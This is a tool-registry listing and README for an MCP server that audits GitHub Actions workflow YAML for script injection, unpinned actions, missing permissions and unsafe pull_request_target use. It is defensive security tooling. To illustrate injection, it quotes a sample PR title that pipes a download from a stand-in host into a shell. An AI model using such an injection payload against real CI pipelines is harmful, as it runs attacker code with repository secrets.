GitHub Actions Security Audit

io.github.tylerscomic-labv1.0.0Updated Oct 2, 2026

Audit GitHub Actions workflows for script injection, unpinned actions and missing permissions.

VerifiedStreamable HTTPWeb executableDeveloper ToolsSecurity & Monitoring

Overview

AI-generated overview

Audits GitHub Actions workflow YAML for script injection, unpinned actions, missing permissions, and unsafe pull_request_target use.

What it does
This server scans GitHub Actions workflow YAML for security problems rather than style issues. It parses the YAML structure and reports script injection from attacker-controlled expressions in run steps, third-party actions pinned only to tags or branches, missing permissions blocks, and pull_request_target combined with checking out the PR head. The audit_workflow tool returns a risk level with each finding's location, explanation, and a concrete fix; check_expression_injection checks a single shell command string.
When to use it
Use it when reviewing or hardening CI/CD workflows, especially before merging changes to workflow files or when auditing repositories that run untrusted pull requests. It suits maintainers who want a focused security check rather than a general YAML linter.
Requirements
The hosted option is a remote streamable HTTP endpoint, so no local runtime is needed. Self-hosting requires Node.js and running the server locally after installing dependencies. The hosted tier is described as free with a paid Pro option.
Before you install
The hosted endpoint receives your workflow YAML, which may contain repository names, branch names, and other configuration details. Self-hosting avoids sending that content to a third party. The audit is read-only analysis and does not modify workflows.

Installation

In SourceWeft

  1. Open GitHub Actions Security Audit in the dashboard and add it to a workspace.
  2. Enable the server for the chats that should use its tools.

Web executable via Streamable HTTP. Remote servers run from the web runtime once configured in a workspace.

Other MCP clients

Add this to your client's mcpServers config.

{
  "mcpServers": {
    "github-actions-audit-mcp": {
      "type": "http",
      "url": "https://github-actions-audit-mcp.mcpize.run/mcp"
    }
  }
}

README

github-actions-audit-mcp

[License: MIT] [Live on MCPize]

An MCP server that audits GitHub Actions workflow YAML for the real vulnerability classes that have caused actual incidents — not a linter, a security scanner. Parses genuine YAML structure (a hand-written block parser scoped to what workflow files actually use), not string/regex matching against the raw file.

What it catches

Script injection. Any ${{ github.event.issue.title }}-style expression that carries attacker-controlled text (issue/PR titles, comments, review bodies, branch names) interpolated directly into a run: shell step. The expression is substituted into the generated shell script before the shell runs it — a PR titled "; curl evil.sh | sh # becomes literal shell syntax, not a string. This is the single most common real-world GitHub Actions vulnerability. Flags the exact expression and shows the env-variable fix that actually neutralizes it.

Unpinned third-party actions. uses: some-action@v4 or @main can be repointed by whoever controls that tag/branch, without you changing a single character in your workflow file — this is exactly what happened in the tj-actions/changed-files compromise (March 2025), where a maintainer's PAT was used to retag v35–v46 to point at a credential-harvesting commit. Only a full 40-character commit SHA is immutable.

Missing permissions: blocks. No explicit permissions: means the GITHUB_TOKEN defaults to whatever your repo/org settings allow — often read-write. If any step is ever compromised, it inherits that full scope.

pull_request_target + head checkout. This trigger runs with the base repo's secrets and a write-scoped token (unlike plain pull_request), and if the workflow also checks out the PR's own head commit, a fork's PR can run arbitrary code with your secrets. Real supply-chain incidents follow this exact pattern.

Tools

audit_workflow

Full audit of a workflow YAML file. Returns a risk level and every finding with its exact location, why it's dangerous, and a concrete fix.

check_expression_injection

Focused check on a single shell command string, for when you just want to sanity-check one run: step without a full workflow file.

Use it

Hosted (recommended): MCPize — free tier, $7/mo Pro.

Self-host:

bash
npm installnode server.js

Part of a small suite

regex-safety-audit-mcp, mcp-trust-audit-mcp, secrets-leak-audit-mcp, dockerfile-audit-mcp.

License

MIT

Source: README.md at commit 9c5baae

Tools

0
Tool metadata has not been indexed yet.

Version history

1
  1. v1.0.0LatestOct 2, 2026